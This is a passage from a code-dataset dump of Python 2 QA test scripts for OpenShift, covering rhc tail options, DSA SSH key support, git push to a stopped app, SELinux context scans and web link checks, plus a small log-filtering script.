proc.Proc(cmd)\n\n\nclass RhcTailFilesOptionsJbossas(OpenShiftTest):\n def test_method(self):\n case = testcase.TestCase(\"[US504][rhc-cartridge]JBoss cartridge: tail/snapshot jboss application files\", [])\n step = dict()\n output = dict()\n # 1.Create an php app\n step[1] = testcase.TestCaseStep(\"1. Create an jbossas app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0\n )\n (retcode, output[1]) = step[1].run()\n\n count = 1 # recording the number of step\n\n option_lst = [ \"-o '-n 2'\",\n \"-o '-c 3'\",\n \"-o '-q'\",\n \"-f %s/logs/boot.log -o '-v'\" % (self.app_name),\n \"-o '--test'\",\n \"-o '-F'\",\n ]\n regex_lst = [ r\"boot.log.*\\n.*\\n.*\\n(?=\\n|$)\",\n r\"boot.log.*\\n.{2}\\n(?=\\n|$)\",\n r\"==> %s/logs/.*?.log\" % (self.app_name),\n r\"==> %s/logs/.*?.log\" % (self.app_name),\n r\"/usr/bin/tail: unrecognized option '--test'\",\n r\"%s/logs/boot.log\" % (self.app_name),\n ]\n for i in range(len(option_lst)):\n option = option_lst[i]\n regex = regex_lst[i]\n # 2.Run rhc tail in subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Run rhc tail in subprocess with option: '%s'\" % (count, option),\n create_proc,\n function_parameters=[\"rhc tail %s -l %s -p '%s' %s %s\" % (self.app_name, self.user_email, self.user_passwd, option, common.RHTEST_RHC_CLIENT_OPTIONS),],\n expect_description=\"rhc tail should be started\",\n )\n (retcode, output[count]) = step[count].run()\n p = retcode\n try:\n # 3.Check the option takes effect\n if i in (2,):\n exp_ret = 1\n else:\n exp_ret = 0\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Check if option: '%s' takes effect\" % (count, option),\n p.grep_output,\n function_parameters=[regex, 3, 5, 0],\n expect_description=\"Function should return %d\" % (exp_ret),\n expect_return=exp_ret\n )\n (retcode, output[count]) = step[count].run()\n finally:\n # 4.Kill the rhc tail subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Kill subprocess: rhc tail %s\" % (count, option),\n p.kill,\n function_parameters=[],\n expect_description=\"subprocess should be killed\",\n expect_return=0\n )\n (retcode, output[count]) = step[count].run()\n\n\t\n\t if retcode==0:\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\t else:\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesOptionsJbossas)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5398760437965393, "alphanum_fraction": 0.5452479124069214, "avg_line_length": 32.15068435668945, "blob_id": "206395ed5b2cff85ba7c84012131006491a027c7", "content_id": "a5fdd91860fe046da0d39c118cd8d7be0dd449ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4840, "license_type": "no_license", "max_line_length": 104, "num_lines": 146, "path": "/automation/open/testmodules/RT/client/rsa_dsa_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport common, OSConf\nimport rhtest\nimport re\nimport shutil\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1608][BI] : Allow RSA and DSA SSH keys - CLI\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"php\"+common.getRandomString(7)\n self.backup_dir = os.path.join(common.get_tmp_dir(),common.getRandomString(10))\n self.ssh_keyname=\"id_rsa\"\n self.ssh_key = os.path.join(os.path.expanduser(\"~\"),\".ssh\", self.ssh_keyname)\n common.env_setup()\n\n def finalize(self):\n self.revert_backup()\n common.update_sshkey()\n\n\nclass RsaDsaSupport(OpenShiftTest):\n \n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/index.php\", \"OpenShift\")\n\n def revert_backup(self):\n backup_key=os.path.join(self.backup_dir, self.ssh_keyname)\n if os.path.exists(backup_key) and os.path.exists(backup_key+\".pub\"):\n self.info(\"Reverting backup from %s...\"%self.backup_dir)\n os.remove(self.ssh_key)\n os.remove(self.ssh_key+\".pub\")\n os.rename(\"%s\"%backup_key, os.path.expanduser(\"~/.ssh/%s\"%self.ssh_keyname))\n os.rename(\"%s.pub\"%(backup_key), os.path.expanduser(\"~/.ssh/%s.pub\"%self.ssh_keyname))\n else:\n self.info(\"No revert due to missing backup!\")\n shutil.rmtree(self.backup_dir)\n\n return 0\n\n def do_backup(self):\n os.makedirs(self.backup_dir)\n self.info(\"Making backup into %s\"%self.backup_dir)\n if not os.path.exists(self.ssh_key):\n self.error(\"SSH key[%s] doesn't exist!\"%self.ssh_key)\n return 1\n try:\n os.rename(self.ssh_key, os.path.join(self.backup_dir, self.ssh_keyname))\n os.rename(self.ssh_key+\".pub\", os.path.join(self.backup_dir, self.ssh_keyname+\".pub\"))\n except Exception as e:\n import traceback\n traceback.print_exc()\n self.error(e)\n return 1\n return 0\n\n def gen_dsa_key(self):\n key_path=os.path.join(common.get_tmp_dir(), self.ssh_keyname)\n try:\n os.remove(key_path)\n except:\n pass\n cmd = \"ssh-keygen -t dsa -N '' -f %s \"%(key_path)\n r = common.cmd_get_status(cmd, quiet=True)\n if r == 0:\n os.rename(key_path, self.ssh_key)\n os.rename(key_path+\".pub\", self.ssh_key+\".pub\")\n return 0\n else:\n self.error(\"Unable to generate new DSA key\")\n return 1\n\n def verify_signature(self):\n f = open(self.ssh_key+\".pub\", 'r')\n key = f.read()\n f.close()\n if re.match(\"^ssh-dss\", key):\n return 0\n return 1\n\n def test_method(self):\n\n self.add_step(\"Backup .ssh/%s key \"%self.ssh_keyname,\n self.do_backup,\n expect_return=0)\n\n self.add_step(\"Create DSA key pair and do update\",\n self.gen_dsa_key,\n expect_return=0)\n\n self.add_step(\"Update the default ssh key\",\n common.update_sshkey,\n expect_return=0)\n\n self.add_step(\"Verify DSA signature\",\n self.verify_signature,\n expect_return=0)\n \n self.add_step(\"Create testing app\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Check new app url is available...\",\n self.verify, \n expect_return=0)\n\n self.add_step(\"Modify and push the application...\",\n self.modify_and_push,\n expect_return=0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def modify_and_push(self):\n test_file = os.path.join(\"php\",\"test.php\")\n common.write_file(os.path.join(self.app_name, test_file), \"<?php phpinfo(); ?>\")\n cmd = \"cd %s && git add %s && git commit -m 'test' -a && git push\" % (self.app_name, test_file),\n (status, output) = common.cmd_get_status_output(cmd)\n if (status == 0):\n return 0\n else:\n self.error(output)\n return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RsaDsaSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5929449796676636, "alphanum_fraction": 0.6031562089920044, "avg_line_length": 38.16363525390625, "blob_id": "425c4581017513c9c864f6e3ebd6fa4b9f8dd409", "content_id": "4efd4950d40aa2d51726d57d2b2a62437163e410", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4309, "license_type": "no_license", "max_line_length": 141, "num_lines": 110, "path": "/automation/open/testmodules/RT/cartridge/git_push_upon_app_stopped.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Verify git push works well if stop app before git push\nhttps://tcms.engineering.redhat.com/case/122289/\n\"\"\"\n\nimport sys,os,commands,time,re\nimport rhtest\nimport testcase,common,OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Verify git push works well if stop app before git push\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + 'uponstop'\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n tcms_testcase_id=122289\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass GitPushUponAppStopped(OpenShiftTest):\n\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # Clean environment variable: SSH_AUTH_SOCK\n if os.environ.has_key(\"SSH_AUTH_SOCK\"):\n del os.environ[\"SSH_AUTH_SOCK\"]\n\n # 2.Stop Application\n self.steps_list.append( testcase.TestCaseStep(\"2. Stop Application\",\n \"rhc app stop %s -l %s -p '%s' %s\" \n % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"App is stopped successfully\",\n expect_return=0))\n # 3.Check the app is unavailable via browser\n \n self.steps_list.append( testcase.TestCaseStep(\"3.Check the app is unavailable via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"The app is unavailable\",\n expect_return=0))\n\n # 4.Custom git hook file\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.app_name)\n key_string = \"@@@testing@@@\"\n self.steps_list.append( testcase.TestCaseStep(\"4.Custom git hook file\",\n \"\"\"echo '\\necho \"%s\"' >> %s\"\"\" % (key_string, hook_file_path),\n expect_description=\"Added 1 line to %s\" % (hook_file_path),\n expect_return=0))\n\n # 5.Git push\n self.steps_list.append( testcase.TestCaseStep(\"5.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push succeeds and '%s' should be found in the output\" % (key_string),\n expect_return=0,\n expect_string_list=[key_string]))\n\n # 6.Check to see if the app is still unavailable\n self.steps_list.append( testcase.TestCaseStep(\n \"6.Check to see if the app is still unavailable\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"The app is still unavailable\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitPushUponAppStopped)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6987179517745972, "alphanum_fraction": 0.7320512533187866, "avg_line_length": 25.89655113220215, "blob_id": "e7d5361416e205f0d852c8cefc4261459cfb25c3", "content_id": "fa856874614733b8d7887cd9628ede285c1d3545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 116, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_scaling_without_jenkins import Ruby18ScalingHotDeployWithoutJenkins\n\nclass Ruby19ScalingHotDeployWithoutJenkins(Ruby18ScalingHotDeployWithoutJenkins):\n \n def __init__(self, config):\n Ruby18ScalingHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby-1.9\"]\n self.config.summary = \"[US2443]Hot deployment support for scalable application - without Jenkins - ruby-1.9\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby19ScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5401146411895752, "alphanum_fraction": 0.5501432418823242, "avg_line_length": 31.080459594726562, "blob_id": "84ea52bf43358758e7ffb2520de98c6867ee1602", "content_id": "3634cf5e2fb57a263f309b2b1e8c75c7fbc2c95b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2792, "license_type": "no_license", "max_line_length": 296, "num_lines": 87, "path": "/automation/open/testmodules/RT/security/selinux_scan_files.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os \nimport sys\nimport rhtest\n\nimport testcase\nimport common\nimport commands\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary=\"[integration][rhc-selinux]SELinux separation - scan context of files\"\n self.app_name = 'scanfile'\n self.app_type = common.app_types['php']\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass SelinuxScanFiles(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False)\n self.assert_equal(ret, 0, \"App should be created successfully\")\n\n # 2. Scan files\n self.info(\"Check file context\")\n ret=self.check_file_context()\n self.assert_equal(ret, 0) \n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_file_context(self):\n libra_fc=[['/etc/rc\\.d/init\\.d/libra','system_u:object_r:libra_initrc_exec_t:s0'],['/etc/rc\\.d/init\\.d/mcollective','system_u:object_r:libra_initrc_exec_t:s0'],['/var/lib/openshift/*','system_u:object_r:libra_var_lib_t:s0'],['/var/lib/openshift/*/.ssh','system_u:object_r:ssh_home_t:s0']]\n for libra_fc_rule in libra_fc:\n cmd='ls -Z %s'%(libra_fc_rule[0])\n (status, output) = common.run_remote_cmd_as_root(cmd)\n print output\n print \"------\"\n if status!=0:\n return 1\n for line in output.split('\\n'):\n if len(line.split())!=4 or ('lrwxrwxrwx.' in line):\n continue\n print line\n context_proc = line.split()[3]\n print context_proc\n context_rule = libra_fc_rule[1]\n print context_rule\n type_proc = context_proc.split(':')[2]\n type_rule = context_rule.split(':')[2]\n# if cmp(context_proc,context_rule)!=0:\n# print 'WARN:',context_proc,'differ from',context_rule\n if cmp(type_proc,type_rule)!=0:\n print 'WARN:',type_proc,'differ from',type_rule\n print line\n return 1\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SelinuxScanFiles)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5965501666069031, "alphanum_fraction": 0.6181570291519165, "avg_line_length": 50.2279052734375, "blob_id": "649e30a32c1c8e221dbc76cf339afd290b63afcb", "content_id": "5f507aba6bc3b7be4e6ddc4d0870233c407ef04d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11015, "license_type": "no_license", "max_line_length": 444, "num_lines": 215, "path": "/automation/open/testmodules/UI/web/case_165717.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165717.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckOpensourcePage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/open-source')]''')\n time.sleep(2)\n\n #check the \"OpenShift\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/p/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''BUZZ''','''//body/div[2]/div/div/div/div/h2/strong''')\n web.go_back() \n #check the \"architecture-overview\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Architecture Overview''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Community Process\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Community Process''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"OpenShift Origin\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[2]/a''')\n time.sleep(2)\n web.check_title(\"Browse:\") \n web.go_back() \n #check the \"Project Bug Reporting\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[3]/a''')\n time.sleep(2)\n web.check_title(\"Log in to Red Hat Bugzilla\") \n web.go_back() \n #check the \"Git-hub\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[4]/a''')\n time.sleep(4)\n web.assert_text_equal_by_xpath('''openshift''','''//body/div/div[2]/div/div/div/h1/span''') \n web.go_back()\n time.sleep(2)\n #check the \"Invitation for public review process for Cartridges\" link \n web.assert_text_equal_by_xpath(\"Invitation for public review process for Cartridges\",'''//div[@id='node-9475']/div/ul[3]/li/a''')\n web.click_element_by_link_text(\"Invitation for public review process for Cartridges\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Invitation for public review process for Cartridges''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Workflow for Cartridge review and inclusion\" link \n web.assert_text_equal_by_xpath(\"Workflow for Cartridge review and inclusion\",'''//div[@id='node-9475']/div/ul[3]/li[2]/a''')\n web.assert_text_equal_by_xpath(\"Workflow for Cartridge review and inclusion\",'''//a[contains(@href, '/community/node/add/wiki_page?edit[title]=Workflow+for+Cartridge+review+and+inclusion')]''')\n\n\n\n\n #check the \"Getting started with Openshift Origin LiveCD\" link \n web.assert_text_equal_by_xpath(\"Getting started with Openshift Origin LiveCD\",'''//div[@id='node-9475']/div/ul[4]/li/a''')\n web.click_element_by_link_text(\"Getting started with Openshift Origin LiveCD\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Getting started with Openshift Origin LiveCD''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \" Build Your Own Paas from the OpenShift Origin LiveCD using liveinst \" link \n web.assert_text_equal_by_xpath(\"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\",'''//div[@id='node-9475']/div/ul[4]/li[2]/a''')\n web.click_element_by_link_text(\"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own Paas from the OpenShift Origin LiveCD using liveinst''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Connect to Openshift Origin installation with JBoss Tools\" link \n web.assert_text_equal_by_xpath(\"Connect to Openshift Origin installation with JBoss Tools\",'''//div[@id='node-9475']/div/ul[4]/li[3]/a''')\n web.click_element_by_link_text(\"Connect to Openshift Origin installation with JBoss Tools\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to Openshift Origin installation with JBoss Tools''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Rebuild Openshift Origin Packages\" link \n web.assert_text_equal_by_xpath(\"Rebuild Openshift Origin Packages\",'''//div[@id='node-9475']/div/ul[4]/li[4]/a''')\n web.click_element_by_link_text(\"Rebuild Openshift Origin Packages\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Rebuild Openshift Origin Packages''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Build Your Own PaaS\" link \n web.assert_text_equal_by_xpath(\"Build Your Own PaaS\",'''//div[@id='node-9475']/div/ul[4]/li[5]/a''')\n web.click_element_by_link_text(\"Build Your Own PaaS\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Build Multi-node PaaS from scratch\" link \n web.assert_text_equal_by_xpath(\"Build Multi-node PaaS from scratch\",'''//div[@id='node-9475']/div/ul[4]/li[6]/a''')\n web.click_element_by_link_text(\"Build Multi-node PaaS from scratch\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Multi-node PaaS from scratch''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Local Dynamic DNS Service\" link \n web.assert_text_equal_by_xpath(\"Local Dynamic DNS Service\",'''//div[@id='node-9475']/div/ul[4]/li[7]/a''')\n web.click_element_by_link_text(\"Local Dynamic DNS Service\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Local Dynamic DNS Service''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Introduction to Cartridge Building\" link \n web.assert_text_equal_by_xpath(\"Introduction to Cartridge Building\",'''//div[@id='node-9475']/div/ul[4]/li[8]/a''')\n web.click_element_by_link_text(\"Introduction to Cartridge Building\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Introduction to Cartridge Building''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"GitHub workflow for submitting pull requests\" link \n web.assert_text_equal_by_xpath(\"GitHub workflow for submitting pull requests\",'''//div[@id='node-9475']/div/ul[4]/li[9]/a''')\n web.click_element_by_link_text(\"GitHub workflow for submitting pull requests\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''GitHub workflow for submitting pull requests''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n\n\n\n\n #check the \"Mailing Lists\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Below is a listing of all the public mailing lists on lists.openshift.redhat.com. Click on a list name to get more information about the list, or to subscribe, unsubscribe, and change the preferences on your subscription. To visit the general information page for an unadvertised list, open a URL similar to this one, but with a '/' and the list name appended.''','''//body/table/tbody/tr[2]/td/p''') \n web.go_back()\n time.sleep(2)\n #check the \"For Developers\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''dev -- Developer discussions around OpenShift and OpenShift Origin''','''//body/p/table/tbody/tr/td/b/font''') \n web.go_back()\n time.sleep(2)\n #check the \"For Users\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''users -- User discussions around OpenShift and OpenShift Origin''','''//body/p/table/tbody/tr/td/b/font''') \n web.go_back()\n time.sleep(2)\n #check the \"Community Forums\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Recent Threads''','''//div[@id='content']/div/div/div/div[3]/div/section/h3''') \n web.go_back()\n time.sleep(2)\n #check the \"Community Blogs\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Blogs''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n time.sleep(2)\n #check the \"#openshift on the irc.freenode.net IRC server\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[4]/a''')\n time.sleep(2)\n web.check_title('''Connection details - freenode Web IRC''')\n web.go_back()\n time.sleep(2)\n #check the \"#openshift-dev on the irc.freenode.net IRC server\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[5]/a''')\n time.sleep(2)\n web.check_title('''Connection details - freenode Web IRC''')\n web.go_back()\n time.sleep(2)\n\n\n\n\n #check the \"FAQ: Frequently Asked Questions\" link \n web.assert_text_equal_by_xpath(\"FAQ: Frequently Asked Questions\",'''//div[@id='node-9475']/div/ul[6]/li/a''')\n web.click_element_by_link_text(\"FAQ: Frequently Asked Questions\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''FAQ: Frequently Asked Questions''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n \n\n\n\n\n self.tearDown()\n\n return self.passed(\" case_165717--CheckOpensourcePage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckOpensourcePage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165717.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.43909627199172974, "alphanum_fraction": 0.4882121682167053, "avg_line_length": 28.941177368164062, "blob_id": "deebc265c2c2a0b524971f97569a50ae5f090f8a", "content_id": "b33ab683da2098024b13c010579f41f1fde6a841", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/loginfo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\n\n\ndef log_filter(t1, t2, ip, file):\n \"\"\"filter useful loginfo\"\"\"\n filtered = open('filtered.txt', 'w')\n for line in file:\n start_string = line[1:25]\n try:\n start_time = time.strptime(start_string, \"%a %b %d %H:%M:%S %Y\")\n except Exception, e:\n continue\n if start_time >= t1 and start_time <= t2:\n print start_time\n if ip in line:\n filtered.write(line + '\\n')\n else:\n continue\n else:\n continue\n filtered.close()\n print 'DONE'\n\n\nif __name__ == '__main__':\n time1 = 'Thu Feb 21 14:15:40 2013'\n time1a = time.strptime(time1, \"%a %b %d %H:%M:%S %Y\")\n time2 = 'Thu Feb 21 14:21:46 2013'\n time2a = time.strptime(time2, \"%a %b %d %H:%M:%S %Y\")\n ip = '10.113.195.178'\n file = './error_log'\n loginfo = open(file)\n filter_result = log_filter(time1a, time2a, ip, loginfo)\n loginfo.close()\n" }, { "alpha_fraction": 0.5422943234443665, "alphanum_fraction": 0.5550405383110046, "avg_line_length": 28.409090042114258, "blob_id": "1c7e3a59099129ab67d562cb84fce839694da32f", "content_id": "389e6be99cdec93a57c5650142674f548a77e23f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2589, "license_type": "no_license", "max_line_length": 104, "num_lines": 88, "path": "/automation/open/testmodules/RT/security/selinux_scan_process.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport commands\n\n# TODO: if this failed, please refer to US1657 for more details\nclass OpenShiftTest(rhtest.Test):\n ITEST = 'DEV'\n\n def initialize(self):\n self.summary=\"[integration][rhc-selinux]SELinux separation - scan context of processes\"\n self.white_list=[\"haproxy\",]\n self.app_name = 'selinux'+common.getRandomString(5)\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\nclass SelinuxScanProcess(OpenShiftTest):\n def test_method(self):\n ret = common.create_app(self.app_name, common.app_types[\"python\"])\n self.assert_equal(ret, 0, \"The app should be created.\")\n\n self.info(\"Check the process SELinux context\")\n ret = self.check_proc_context()\n self.assert_equal(ret, 0)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_proc_context(self):\n (status, output) = common.run_remote_cmd_as_root(\"ps auxZ\")\n if status!=0:\n return 1\n\n result = 0\n for line in output.split('\\n'):\n app_without_user = 0\n if len(line)==0:\n continue\n print line \n if '/var/lib/openshift/' in line:\n app_without_user = 1\n try:\n uid = line.split()[1]\n except Exception as e:\n self.error(\"Empty line?: %s\"%e)\n continue\n if uid in self.white_list:\n continue\n if uid.isdigit() and int(uid)>=500:\n self.info(\"WHITE\")\n app_without_user = 0\n context=line.split()[0]\n if not context.split(':')[2]=='openshift_t':\n self.info(\"WARN: SELinux type of user's proc doesn't match openshift_t: %s\"%context)\n result += 1\n continue\n if not ('c'+uid)==context.split(',')[1]:\n print \"WARN: SELinux MCS label of user's proc doesn't match uid:\",context,uid\n result += 1\n if app_without_user == 1:\n print \"WARN: Tenant's proc got illegal uid:\\n\",line\n result += 1\n return result\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SelinuxScanProcess)\n return suite\n\ndef run(conf):\n suite = 